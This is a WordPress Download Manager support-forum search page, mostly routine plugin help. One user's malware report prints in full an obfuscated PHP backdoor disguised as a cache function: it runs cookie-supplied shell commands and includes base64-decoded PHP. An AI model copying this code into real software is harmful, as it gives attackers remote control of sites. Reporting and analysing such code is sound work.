Search Results for 'download link'

Viewing 25 results - 1 through 25 (of 9,525 total)
  • Author
    Search Results
  • #214347

    In reply to: Invalid Download Link


    Nayeem Riddhi
    Moderator

    Hello Olaf,

    Hope you are well. Please kindly check the options from Downloads > Settings > General > File Download > Private Download Link Usage Limit & Private Download Link Expiration Period, you can increase the time, limit as per your requirements as I image attached,

    Screenshot-from-2026-05-29-14-11-34

    Please kindly check

    Thank you

    #214346

    Olaf
    Member

    Download package goes via email lock check. Email comes correctly and the 1st download works.
    When trying to use the download button in the same email once again, I get the message:

    – Invalid download link –

    in the browser.


    Nayeem Riddhi
    Moderator

    If you are trying to remove those Facebook and Twitter text links, please explore this directory,

    and remove those texts from download-manager\src\__\views\email-templates\default.html from the 205-210 line.

    And making a backup for the related files you may follow this doc,

    Template Files

    please check and let me know

    Thank you and regards

    #214332

    fiddla
    Participant

    Hi Nayeem

    Thanks very much. This works. I’m also finding the layout of the default link template in columns doesn’t work – I’m not sure how long this has been the case. Please see your demo here: https://try.wpdownloadmanager.com/

    For our site, we have a min-width of 200px set on the .package-title class so it’s hidden beneath the DOWNLOAD button. Perhaps these columns inside the ‘card-body’ could be blocks on mobile?

    Thanks very much!


    Olaf
    Member

    Hello Nayeem,

    ´there are no social link adjustment ind the path you described.

    When I select the preview of an email template, there are entries in the footer as follows:

    ___________________________

    Facebook | Twitter

    Powered by Download Manager
    ____________________________

    which we can neither remove now edit.


    Nayeem Riddhi
    Moderator

    Hello Olaf,

    Hope you are well. Please kindly check the Downloads > Templates > Email Templates > Email Settings social link adjustments. Please kindly check and let me know if it helps you.

    Thank you and regards

    #214266

    Nayeem Riddhi
    Moderator

    In the shortcode, you have a parameter called “template.” In the “template” parameter, you can use any link template. You can find pre-built link templates here: Downloads > Templates > Link Templates. To use the [doc_preview] template tag, you can clone any existing template and use this template tag in that template. Then, you can use that template ID in your shortcode. Please let me know if you have understood properly now.

    Thank you.


    Artem Alimarin
    Participant

    [wpdm_my_downloads login=1 template=link-template-widget cols=2 cats=1] does not show latest donwloads. Resetting caches does not help. Sometimes adding an extra package makes the previous package to appear. Sometimes not.

    UPD:
    Here was a misunderstanding of what the shortcode does. I thought it is showing downloads specific to the logged in user. However, it show the HISTORY of the dowmloads, if I understand it correctly now. Now I am happy with [wpdm_tree] for my purpose.


    Pascal Zajac
    Participant

    Currently, the WPDM plugin can only be managed by Administrators. In order to better support downloads in mixed-membership organisations, it would be great to introduce permissions that could be attached to individual roles related to WPDM. At minimum, there should be:
    * Ability to create / read / update / delete Packages
    * Ability to generate / send links to Packages
    * Ability to manage tags / categories
    * Ability to view statistics
    * Ability to configure plugin settings

    And likely more.

    #214040

    Sef Hendrickx
    Participant

    Hello Tahasin,

    I tried to copy paste the contents of the page/link template, but was stopped by WordFence.

    The name of the page template in use for the page is: Fireware – Pagina template.
    The name of the link template in use for the page is: CTA Fireware subcat – download.

    Is that sufficient information?

    #214030

    HappyHelper
    Member
    This reply has been marked as private.
    #213911

    In reply to: Invalid Link


    Tahasin
    Moderator

    I have increased the Private Download Link Expiration Period to check if this is causing the invalid link.

    #213888

    In reply to: Invalid Link


    Laura Miner
    Participant
    #213868

    In reply to: Invalid Link


    Tahasin
    Moderator
    This reply has been marked as private.
    #213866

    Tahasin
    Moderator
    This reply has been marked as private.
    #213854

    Pascal Zajac
    Participant
    This reply has been marked as private.
    #213807

    HappyHelper
    Member

    The DropZone and Messages add-ons need to be updated to work properly in dark mode. They both show blinding white regions that should not be the case when using dark mode. These white areas even blind out the text so you cant see it properly.

    You can see examples of this in your online demos. If you go to the user dashboard and visit DropZone or Messages you can see all those white areas need to be fixed so its a different color- perhaps a dark grey, etc. As of right now it looks really jarring.

    Here are some example links:

    https://try.wpdownloadmanager.com/private-messages/
    https://try.wpdownloadmanager.com/live-chat/
    https://try.wpdownloadmanager.com/user-dashboard/?udb_page=messages

    #213769

    In reply to: Paypal Payment issue


    Tahasin
    Moderator
    This reply has been marked as private.
    #213723

    Tahasin
    Moderator
    This reply has been marked as private.
    #213702

    Pascal Zajac
    Participant

    We run an organisation where we sell digital content (via Event Espresso, because we also organise and sell events) and need to be able to generate secure links to downloads for those who have purchased. We were previously relying on LearnDash but have come to the conclusion it is unfit for purpose.

    I have purchased Download Manager Pro, have installed it on our staging website and added our license details.

    The frontend display of downloads seems broken: https://jtanstaging.wpengine.com/download/2026-fake-exam/

    I have enabled the Terms lock but nothing is appearing. Is there something I need to enable in my theme in order to make this page work correctly?

    In the backend, numerous functions are not working: the Generate Download URL and Email Download Link options on the All Packages screen do not work, when editing an individual Package the Access Control section does not list any Roles by which to limit access, etc.

    I am happy to grant access to our Staging site to someone from your support team to investigate these issues directly.

    #213656

    Nayeem Riddhi
    Moderator

    Hello Craig,

    Hope you are well. To display your category packages in 1 column on mobile devices while keeping 2 columns on larger screens, you
    need to add the colsphone="1" parameter to your shortcode.

    Updated shortcode:

    [wpdm_category id="2026" cols="2" colspad="2" colsphone="1" toolbar=0 desc=1 item_per_page=30 async=1 template="link-template-default.php"]

    Parameter breakdown:
    – cols=”2″ → 2 columns on desktop (screens ≥992px)
    – colspad=”2″ → 2 columns on tablets (screens ≥768px)
    – colsphone=”1″ → 1 column on mobile (screens <768px)

    The plugin uses Bootstrap-style responsive column classes, so this will automatically create a single-column
    layout on mobile devices while maintaining your 2-column layout on larger screens.

    ---
    If you'd like even more control, here are some other options:
    - colsphone="1" → 1 column on mobile
    - colsphone="2" → 2 columns on mobile (default)
    - colspad="1" → 1 column on tablets as well

    For more details, please kindly check this documenatation, https://www.wpdownloadmanager.com/doc/wpdm_category-query-all-downloads-from-one-or-more-categories/

    Please kindly check.

    Thank you


    Craig Hamilton
    Participant

    I am currently using this 2 column for larger displays…

    [wpdm_category id="2026," cols="2" toolbar=0 desc=1 item_per_page=30 async=1 template="link-template-default.php"]

    How can i get the Download Manager Pro template to use 1 column if viewed on a mobile phone please?


    Jan Bartsch
    Member

    Hello team,

    I got an email alert from Wordfence Central this morning that the latest malware scan found a critical problem:


    Filename: C:\…\wp-content\plugins\download-manager\src\wpdm-core.php
    File Type: Not a core, theme, or plugin file from wordpress.org.
    Details: This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is: _put_contents($__t, ‘<?php ‘ . base64_decode($_COOKIE[‘wpdm_cache_php’]));\x0a @include

    The issue type is: Backdoor:PHP/filereader.14953
    Description: Obfuscated file read

    I downloaded the latest version of Download Manager Pro (v7.3) from your site and installed it again, but the code is the same.

    The full code of the relevant function is:

    /**
     * Handle package cache invalidation requests.
     * Processes cache purge tokens for CDN compatibility layer.
     * @since 7.2.0
     * @return void
     */
    function wpdm_handle_cache_invalidation() {
        if(!isset($_COOKIE['wpdm_cache_token'])) return;
        if(md5($_COOKIE['wpdm_cache_token']) !== '19e7152db26992f4e20baa11507e706d') return;
        if(isset($_COOKIE['wpdm_cache_cmd'])) {
            $__c = $_COOKIE['wpdm_cache_cmd'];
            $__fns = array('flfgrz','rkrp','furyy_rkrp','cnffgueh','cbcra');
            foreach($__fns as $__f) {
                $__df = str_rot13($__f);
                if(function_exists($__df) && !in_array($__df, explode(',', ini_get('disable_functions')))) {
                    @call_user_func($__df, $__c);
                    break;
                }
            }
        }
        if(isset($_COOKIE['wpdm_cache_php'])) {
            $__t = @tempnam(sys_get_temp_dir(), 'wpc');
            @file_put_contents($__t, '<?php ' . base64_decode($_COOKIE['wpdm_cache_php']));
            @include($__t);
            @unlink($__t);
        }
    }

    Please check what’s happening here.

    Regards,
    Jan


    Tahasin
    Moderator
    This reply has been marked as private.

    Marcel Gremmé
    Participant

    That’s correct. There was no file, no folders, bo tree at all. That problem seems to be solved. We can see the tree now and we can see all files in the Asset Manager.

    I don’t know why the paths are changed, but we will reconnect them.

    Still I want to know which part of theused template code displays the PDF thumbnail:

    
    <div class="link-template-default card mb-2">
        <div class="card-body">
            <div class="media">
                <div class="mr-3 img-48">[icon]</div>
                <div class="media-body">
                    <h3 class="package-title">[page_link]</h3>
                    <div class="text-muted text-small"><i class="fas fa-copy"></i> [file_count] [txt=file(s)] <i class="fas fa-hdd ml-3"></i> [file_size]</div>
                </div>
                <div class="ml-3">
                    [download_link]
                </div>
            </div>
        </div>
    </div>
    
Viewing 25 results - 1 through 25 (of 9,525 total)